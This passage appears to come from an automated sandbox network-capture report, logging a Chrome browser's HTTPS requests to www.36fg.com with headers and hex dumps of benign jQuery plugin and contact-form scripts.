                                                        Data Ascii: &&this.op(b,">",g[a+1]||h-f)&&(d="left"===c?a+1:a),d===-1},this)),this.settings.loop||(this.op(b,">",g[this.minimum()])?d=b=this.minimum():this.op(b,"<",g[this.maximum()])&&(d=b=this.maximum())),d},e.prototype.animate=function(b){var c=this.speed()>0;this


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        27192.168.2.549765104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:56 UTC609OUTGET /static/js/waypoints.min.js HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://www.36fg.com/tp-Related/18104.html
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:57 UTC999INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:57 GMT
                                                        Content-Type: application/javascript
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        last-modified: Fri, 09 Jul 2021 02:03:42 GMT
                                                        vary: Accept-Encoding
                                                        etag: W/"60e7ae7e-1f6c"
                                                        expires: Sat, 15 Mar 2025 12:18:02 GMT
                                                        Cache-Control: max-age=43200
                                                        strict-transport-security: max-age=31536000
                                                        cf-cache-status: REVALIDATED
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rGmSAhR40dpwvOvnRMtySGFhAWC6lJh62YlLeTWZb0zq%2BKvWnhLpOUtVrTY%2ByMKAUumyFf576%2BA%2F6YWCVGO5Ukze%2BF0Ps44Cw2SzMHfTYmnfQI53AZQe9zsn6wul6cA%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d4aa5ce4aa2a-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2275&min_rtt=2162&rtt_var=892&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1181&delivery_rate=1350601&cwnd=237&unsent_bytes=0&cid=6647ad9b9d0038ea&ts=339&x=0"
                                                        2025-03-15 00:17:57 UTC370INData Raw: 31 66 36 63 0d 0a 2f 2f 20 47 65 6e 65 72 61 74 65 64 20 62 79 20 43 6f 66 66 65 65 53 63 72 69 70 74 20 31 2e 36 2e 32 0a 2f 2a 0a 6a 51 75 65 72 79 20 57 61 79 70 6f 69 6e 74 73 20 2d 20 76 32 2e 30 2e 33 0a 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 31 2d 32 30 31 33 20 43 61 6c 65 62 20 54 72 6f 75 67 68 74 6f 6e 0a 44 75 61 6c 20 6c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 47 50 4c 20 6c 69 63 65 6e 73 65 2e 0a 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 69 6d 61 6b 65 77 65 62 74 68 69 6e 67 73 2f 6a 71 75 65 72 79 2d 77 61 79 70 6f 69 6e 74 73 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 6c 69 63 65 6e 73 65 73 2e 74 78 74 0a 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76
                                                        Data Ascii: 1f6c// Generated by CoffeeScript 1.6.2/*jQuery Waypoints - v2.0.3Copyright (c) 2011-2013 Caleb TroughtonDual licensed under the MIT license and GPL license.https://github.com/imakewebthings/jquery-waypoints/blob/master/licenses.txt*/(function(){v
                                                        2025-03-15 00:17:57 UTC1369INData Raw: 6c 69 63 65 3b 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 69 66 28 74 79 70 65 6f 66 20 64 65 66 69 6e 65 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 64 65 66 69 6e 65 2e 61 6d 64 29 7b 72 65 74 75 72 6e 20 64 65 66 69 6e 65 28 22 77 61 79 70 6f 69 6e 74 73 22 2c 5b 22 6a 71 75 65 72 79 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 65 28 6e 2c 74 29 7d 29 7d 65 6c 73 65 7b 72 65 74 75 72 6e 20 65 28 74 2e 6a 51 75 65 72 79 2c 74 29 7d 7d 29 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 6e 2c 72 29 7b 76 61 72 20 69 2c 6f 2c 6c 2c 73 2c 66 2c 75 2c 61 2c 63 2c 68 2c 64 2c 70 2c 79 2c 76 2c 77 2c 67 2c 6d 3b 69 3d 6e 28 72 29 3b 63 3d 74 2e 63 61 6c 6c 28 72 2c 22 6f 6e 74 6f 75 63 68 73 74 61 72 74 22 29 3e 3d 30 3b 73 3d 7b 68 6f 72
                                                        Data Ascii: lice;(function(t,e){if(typeof define==="function"&&define.amd){return define("waypoints",["jquery"],function(n){return e(n,t)})}else{return e(t.jQuery,t)}})(this,function(n,r){var i,o,l,s,f,u,a,c,h,d,p,y,v,w,g,m;i=n(r);c=t.call(r,"ontouchstart")>=0;s={hor
                                                        2025-03-15 00:17:57 UTC1369INData Raw: 72 29 7b 76 61 72 20 69 2c 6f 2c 6c 3b 6c 3d 5b 5d 3b 6f 3d 72 2e 6e 65 77 53 63 72 6f 6c 6c 3e 72 2e 6f 6c 64 53 63 72 6f 6c 6c 3b 69 3d 6f 3f 72 2e 66 6f 72 77 61 72 64 3a 72 2e 62 61 63 6b 77 61 72 64 3b 6e 2e 65 61 63 68 28 65 2e 77 61 79 70 6f 69 6e 74 73 5b 74 5d 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 2c 69 3b 69 66 28 72 2e 6f 6c 64 53 63 72 6f 6c 6c 3c 28 6e 3d 65 2e 6f 66 66 73 65 74 29 26 26 6e 3c 3d 72 2e 6e 65 77 53 63 72 6f 6c 6c 29 7b 72 65 74 75 72 6e 20 6c 2e 70 75 73 68 28 65 29 7d 65 6c 73 65 20 69 66 28 72 2e 6e 65 77 53 63 72 6f 6c 6c 3c 28 69 3d 65 2e 6f 66 66 73 65 74 29 26 26 69 3c 3d 72 2e 6f 6c 64 53 63 72 6f 6c 6c 29 7b 72 65 74 75 72 6e 20 6c 2e 70 75 73 68 28 65 29 7d 7d 29 3b 6c 2e 73 6f 72 74 28 66 75 6e
                                                        Data Ascii: r){var i,o,l;l=[];o=r.newScroll>r.oldScroll;i=o?r.forward:r.backward;n.each(e.waypoints[t],function(t,e){var n,i;if(r.oldScroll<(n=e.offset)&&n<=r.newScroll){return l.push(e)}else if(r.newScroll<(i=e.offset)&&i<=r.oldScroll){return l.push(e)}});l.sort(fun
                                                        2025-03-15 00:17:57 UTC1369INData Raw: 6f 6e 74 65 78 74 53 63 72 6f 6c 6c 2d 69 3b 69 66 28 72 2e 6f 70 74 69 6f 6e 73 2e 6f 6e 6c 79 4f 6e 53 63 72 6f 6c 6c 26 26 6c 21 3d 6e 75 6c 6c 7c 7c 21 72 2e 65 6e 61 62 6c 65 64 29 7b 72 65 74 75 72 6e 7d 69 66 28 6c 21 3d 3d 6e 75 6c 6c 26 26 6c 3c 28 73 3d 65 2e 6f 6c 64 53 63 72 6f 6c 6c 29 26 26 73 3c 3d 72 2e 6f 66 66 73 65 74 29 7b 72 65 74 75 72 6e 20 72 2e 74 72 69 67 67 65 72 28 5b 65 2e 62 61 63 6b 77 61 72 64 5d 29 7d 65 6c 73 65 20 69 66 28 6c 21 3d 3d 6e 75 6c 6c 26 26 6c 3e 28 66 3d 65 2e 6f 6c 64 53 63 72 6f 6c 6c 29 26 26 66 3e 3d 72 2e 6f 66 66 73 65 74 29 7b 72 65 74 75 72 6e 20 72 2e 74 72 69 67 67 65 72 28 5b 65 2e 66 6f 72 77 61 72 64 5d 29 7d 65 6c 73 65 20 69 66 28 6c 3d 3d 3d 6e 75 6c 6c 26 26 65 2e 6f 6c 64 53 63 72 6f 6c 6c
                                                        Data Ascii: ontextScroll-i;if(r.options.onlyOnScroll&&l!=null||!r.enabled){return}if(l!==null&&l<(s=e.oldScroll)&&s<=r.offset){return r.trigger([e.backward])}else if(l!==null&&l>(f=e.oldScroll)&&f>=r.offset){return r.trigger([e.forward])}else if(l===null&&e.oldScroll
                                                        2025-03-15 00:17:57 UTC1369INData Raw: 6f 74 6f 74 79 70 65 2e 64 65 73 74 72 6f 79 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 73 5b 74 68 69 73 2e 61 78 69 73 5d 5b 74 68 69 73 2e 69 64 5d 3b 64 65 6c 65 74 65 20 74 68 69 73 2e 63 6f 6e 74 65 78 74 2e 77 61 79 70 6f 69 6e 74 73 5b 74 68 69 73 2e 61 78 69 73 5d 5b 74 68 69 73 2e 69 64 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 63 6f 6e 74 65 78 74 2e 63 68 65 63 6b 45 6d 70 74 79 28 29 7d 3b 74 2e 67 65 74 57 61 79 70 6f 69 6e 74 73 42 79 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3b 72 3d 6e 28 74 29 2e 64 61 74 61 28 77 29 3b 69 66 28 21 72 29 7b 72 65 74 75 72 6e 5b 5d 7d 65 3d 6e 2e 65 78 74 65 6e 64 28 7b 7d 2c 73 2e 68 6f 72 69 7a 6f 6e 74 61 6c 2c 73 2e 76 65 72 74 69 63 61 6c 29 3b 72
                                                        Data Ascii: ototype.destroy=function(){delete s[this.axis][this.id];delete this.context.waypoints[this.axis][this.id];return this.context.checkEmpty()};t.getWaypointsByElement=function(t){var e,r;r=n(t).data(w);if(!r){return[]}e=n.extend({},s.horizontal,s.vertical);r
                                                        2025-03-15 00:17:57 UTC1369INData Raw: 74 73 2e 6c 65 6e 67 74 68 3f 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 31 29 3a 5b 5d 3b 69 66 28 64 5b 72 5d 29 7b 72 65 74 75 72 6e 20 64 5b 72 5d 2e 61 70 70 6c 79 28 74 68 69 73 2c 74 29 7d 65 6c 73 65 20 69 66 28 6e 2e 69 73 46 75 6e 63 74 69 6f 6e 28 72 29 29 7b 72 65 74 75 72 6e 20 64 2e 69 6e 69 74 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 65 6c 73 65 20 69 66 28 6e 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 72 29 29 7b 72 65 74 75 72 6e 20 64 2e 69 6e 69 74 2e 61 70 70 6c 79 28 74 68 69 73 2c 5b 6e 75 6c 6c 2c 72 5d 29 7d 65 6c 73 65 20 69 66 28 21 72 29 7b 72 65 74 75 72 6e 20 6e 2e 65 72 72 6f 72 28 22 6a 51 75 65 72 79 20 57 61 79 70 6f 69 6e 74 73 20 6e 65 65 64 73 20 61 20 63 61 6c 6c 62 61 63 6b 20 66
                                                        Data Ascii: ts.length?e.call(arguments,1):[];if(d[r]){return d[r].apply(this,t)}else if(n.isFunction(r)){return d.init.apply(this,arguments)}else if(n.isPlainObject(r)){return d.init.apply(this,[null,r])}else if(!r){return n.error("jQuery Waypoints needs a callback f
                                                        2025-03-15 00:17:57 UTC837INData Raw: 6e 20 65 2e 6f 66 66 73 65 74 3e 74 2e 6f 6c 64 53 63 72 6f 6c 6c 2e 78 7d 29 7d 2c 65 6e 61 62 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 68 2e 5f 69 6e 76 6f 6b 65 28 22 65 6e 61 62 6c 65 22 29 7d 2c 64 69 73 61 62 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 68 2e 5f 69 6e 76 6f 6b 65 28 22 64 69 73 61 62 6c 65 22 29 7d 2c 64 65 73 74 72 6f 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 68 2e 5f 69 6e 76 6f 6b 65 28 22 64 65 73 74 72 6f 79 22 29 7d 2c 65 78 74 65 6e 64 46 6e 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 64 5b 74 5d 3d 65 7d 2c 5f 69 6e 76 6f 6b 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3b 65 3d 6e 2e 65 78 74 65 6e 64 28 7b 7d 2c 73 2e 76 65 72 74 69
                                                        Data Ascii: n e.offset>t.oldScroll.x})},enable:function(){return h._invoke("enable")},disable:function(){return h._invoke("disable")},destroy:function(){return h._invoke("destroy")},extendFn:function(t,e){return d[t]=e},_invoke:function(t){var e;e=n.extend({},s.verti
                                                        2025-03-15 00:17:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        28192.168.2.549767104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:57 UTC609OUTGET /static/js/counterup.min.js HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://www.36fg.com/tp-Related/18104.html
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:57 UTC459INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:57 GMT
                                                        Content-Type: application/javascript
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Server: cloudflare
                                                        Last-Modified: Fri, 09 Jul 2021 02:03:32 GMT
                                                        Vary: Accept-Encoding
                                                        Etag: W/"60e7ae74-42b"
                                                        Expires: Sat, 15 Mar 2025 12:18:03 GMT
                                                        Cache-Control: max-age=43200
                                                        Strict-Transport-Security: max-age=31536000
                                                        Cf-Cache-Status: REVALIDATED
                                                        CF-RAY: 9207d4ac1d7c0dc7-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-15 00:17:57 UTC910INData Raw: 34 32 62 0d 0a 2f 2a 21 0a 2a 20 6a 71 75 65 72 79 2e 63 6f 75 6e 74 65 72 75 70 2e 6a 73 20 31 2e 30 0a 2a 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 33 2c 20 42 65 6e 6a 61 6d 69 6e 20 49 6e 74 61 6c 20 68 74 74 70 3a 2f 2f 67 61 6d 62 69 74 2e 70 68 20 40 62 66 69 6e 74 61 6c 0a 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 47 50 4c 20 76 32 20 4c 69 63 65 6e 73 65 0a 2a 0a 2a 20 44 61 74 65 3a 20 4e 6f 76 20 32 36 2c 20 32 30 31 33 0a 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 66 6e 2e 63 6f 75 6e 74 65 72 55 70 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 65 2e 65 78 74 65 6e 64 28 7b 74 69 6d 65 3a 34 30 30 2c 64 65 6c 61 79 3a 31 30 7d 2c 74 29 3b 72 65 74 75 72 6e 20
                                                        Data Ascii: 42b/*!* jquery.counterup.js 1.0** Copyright 2013, Benjamin Intal http://gambit.ph @bfintal* Released under the GPL v2 License** Date: Nov 26, 2013*/(function(e){"use strict";e.fn.counterUp=function(t){var n=e.extend({time:400,delay:10},t);return
                                                        2025-03-15 00:17:57 UTC169INData Raw: 2e 64 61 74 61 28 22 63 6f 75 6e 74 65 72 75 70 2d 66 75 6e 63 22 2c 6e 75 6c 6c 29 7d 7d 3b 74 2e 64 61 74 61 28 22 63 6f 75 6e 74 65 72 75 70 2d 66 75 6e 63 22 2c 63 29 3b 73 65 74 54 69 6d 65 6f 75 74 28 74 2e 64 61 74 61 28 22 63 6f 75 6e 74 65 72 75 70 2d 66 75 6e 63 22 29 2c 72 2e 64 65 6c 61 79 29 7d 3b 74 2e 77 61 79 70 6f 69 6e 74 28 69 2c 7b 6f 66 66 73 65 74 3a 22 31 30 30 25 22 2c 74 72 69 67 67 65 72 4f 6e 63 65 3a 21 30 7d 29 7d 29 7d 7d 29 28 6a 51 75 65 72 79 29 3b 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: .data("counterup-func",null)}};t.data("counterup-func",c);setTimeout(t.data("counterup-func"),r.delay)};t.waypoint(i,{offset:"100%",triggerOnce:!0})})}})(jQuery);0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        29192.168.2.549768104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:57 UTC605OUTGET /static/js/scrolltop.js HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://www.36fg.com/tp-Related/18104.html
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:57 UTC1002INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:57 GMT
                                                        Content-Type: application/javascript
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        last-modified: Fri, 09 Jul 2021 02:03:38 GMT
                                                        vary: Accept-Encoding
                                                        etag: W/"60e7ae7a-8bf"
                                                        expires: Sat, 15 Mar 2025 04:16:24 GMT
                                                        Cache-Control: max-age=43200
                                                        strict-transport-security: max-age=31536000
                                                        Age: 28898
                                                        cf-cache-status: HIT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LYOV9YCAofhdONJdBieXv5Dh45Xpo0zTFPVAxCll88WWSwFTtJqsFVu6k9u6uBOa6Xt6eJd%2FKMgc%2BSD%2BfldNtshOJGdQRm0RCPs43%2BowRnBvUaGo9tA%2FjrHUKHrXVfw%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d4ac7b9f18f2-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1564&min_rtt=1546&rtt_var=616&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=1177&delivery_rate=1726788&cwnd=215&unsent_bytes=0&cid=dc7e602fba8a19ed&ts=155&x=0"
                                                        2025-03-15 00:17:57 UTC367INData Raw: 38 62 66 0d 0a 2f 2a 2a 0a 20 2a 20 4d 61 74 65 72 69 61 6c 2d 73 63 72 6f 6c 6c 54 6f 70 0a 20 2a 0a 20 2a 20 41 75 74 68 6f 72 3a 20 42 61 72 74 68 6f 6c 6f 6d 65 6a 0a 20 2a 20 57 65 62 73 69 74 65 3a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 62 61 72 74 68 6f 6c 6f 6d 65 6a 2f 6d 61 74 65 72 69 61 6c 2d 73 63 72 6f 6c 6c 54 6f 70 0a 20 2a 20 44 6f 63 73 3a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 62 61 72 74 68 6f 6c 6f 6d 65 6a 2f 6d 61 74 65 72 69 61 6c 2d 73 63 72 6f 6c 6c 54 6f 70 0a 20 2a 20 52 65 70 6f 3a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 62 61 72 74 68 6f 6c 6f 6d 65 6a 2f 6d 61 74 65 72 69 61 6c 2d 73 63 72 6f 6c 6c 54 6f 70 0a 20 2a 20 49 73 73 75 65 73 3a 20 68 74 74 70 73 3a 2f
                                                        Data Ascii: 8bf/** * Material-scrollTop * * Author: Bartholomej * Website: https://github.com/bartholomej/material-scrollTop * Docs: https://github.com/bartholomej/material-scrollTop * Repo: https://github.com/bartholomej/material-scrollTop * Issues: https:/
                                                        2025-03-15 00:17:57 UTC1369INData Raw: 7b 0a 0a 20 20 20 20 20 20 20 20 76 61 72 20 5f 20 3d 20 74 68 69 73 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 72 65 61 6b 70 6f 69 6e 74 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 73 63 72 6f 6c 6c 54 6f 20 3d 20 30 3b 0a 0a 20 20 20 20 20 20 20 20 5f 2e 62 74 6e 43 6c 61 73 73 20 3d 20 27 2e 6d 61 74 65 72 69 61 6c 2d 73 63 72 6f 6c 6c 74 6f 70 27 3b 0a 20 20 20 20 20 20 20 20 5f 2e 72 65 76 65 61 6c 43 6c 61 73 73 20 3d 20 27 72 65 76 65 61 6c 27 3b 0a 20 20 20 20 20 20 20 20 5f 2e 62 74 6e 45 6c 65 6d 65 6e 74 20 3d 20 24 28 5f 2e 62 74 6e 43 6c 61 73 73 29 3b 0a 0a 20 20 20 20 20 20 20 20 5f 2e 69 6e 69 74 69 61 6c 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 76 65 61 6c 45 6c 65 6d 65 6e 74 3a 20 27 62 6f 64 79 27 2c 0a 20 20 20 20 20
                                                        Data Ascii: { var _ = this, breakpoint; var scrollTo = 0; _.btnClass = '.material-scrolltop'; _.revealClass = 'reveal'; _.btnElement = $(_.btnClass); _.initial = { revealElement: 'body',
                                                        2025-03-15 00:17:57 UTC510INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 74 79 70 65 6f 66 20 63 61 6c 6c 62 61 63 6b 20 3d 3d 3d 20 22 66 75 6e 63 74 69 6f 6e 22 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 6c 6c 62 61 63 6b 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 24 2e 66 6e 2e 6d 61 74 65 72 69 61 6c 53 63 72 6f 6c 6c 54 6f 70 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 5f 20 3d 20 74 68 69 73 2c 0a 20 20
                                                        Data Ascii: if (typeof callback === "function") { callback(); } } }); return false; }); } $.fn.materialScrollTop = function() { var _ = this,
                                                        2025-03-15 00:17:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        30192.168.2.549769104.21.64.14436912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-15 00:17:57 UTC605OUTGET /static/js/ajax-form.js HTTP/1.1
                                                        Host: www.36fg.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://www.36fg.com/tp-Related/18104.html
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
                                                        2025-03-15 00:17:57 UTC1000INHTTP/1.1 200 OK
                                                        Date: Sat, 15 Mar 2025 00:17:57 GMT
                                                        Content-Type: application/javascript
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        last-modified: Fri, 09 Jul 2021 02:03:42 GMT
                                                        vary: Accept-Encoding
                                                        etag: W/"60e7ae7e-4bf"
                                                        expires: Sat, 15 Mar 2025 04:16:24 GMT
                                                        Cache-Control: max-age=43200
                                                        strict-transport-security: max-age=31536000
                                                        CF-Cache-Status: HIT
                                                        Age: 28898
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wEzimEzVoKv%2FXP6mEvZ1BbcGsIX2GZ9xbsEeNvApfiQy%2F3ikGkJaEkHg59SB5KkY9NqkmUfxvZmLSvzrt7ahCL%2BerNXYyf%2FySu3C4Fmvu2rnatdlQ1o9T7e22bGyMRs%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 9207d4ad2b689e05-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1936&min_rtt=1918&rtt_var=756&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2815&recv_bytes=1177&delivery_rate=1412675&cwnd=175&unsent_bytes=0&cid=c33fa7e32d2eb389&ts=156&x=0"
                                                        2025-03-15 00:17:57 UTC369INData Raw: 34 62 66 0d 0a 24 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 0a 09 2f 2f 20 47 65 74 20 74 68 65 20 66 6f 72 6d 2e 0a 09 76 61 72 20 66 6f 72 6d 20 3d 20 24 28 27 23 61 6a 61 78 2d 63 6f 6e 74 61 63 74 27 29 3b 0a 0a 09 2f 2f 20 47 65 74 20 74 68 65 20 6d 65 73 73 61 67 65 73 20 64 69 76 2e 0a 09 76 61 72 20 66 6f 72 6d 4d 65 73 73 61 67 65 73 20 3d 20 24 28 27 2e 66 6f 72 6d 2d 6d 65 73 73 61 67 65 27 29 3b 0a 0a 09 2f 2f 20 53 65 74 20 75 70 20 61 6e 20 65 76 65 6e 74 20 6c 69 73 74 65 6e 65 72 20 66 6f 72 20 74 68 65 20 63 6f 6e 74 61 63 74 20 66 6f 72 6d 2e 0a 09 24 28 66 6f 72 6d 29 2e 73 75 62 6d 69 74 28 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 09 09 2f 2f 20 53 74 6f 70 20 74 68 65 20 62 72 6f 77 73 65 72 20 66 72 6f 6d 20 73 75 62 6d 69 74 74 69
                                                        Data Ascii: 4bf$(function() {// Get the form.var form = $('#ajax-contact');// Get the messages div.var formMessages = $('.form-message');// Set up an event listener for the contact form.$(form).submit(function(e) {// Stop the browser from submitti
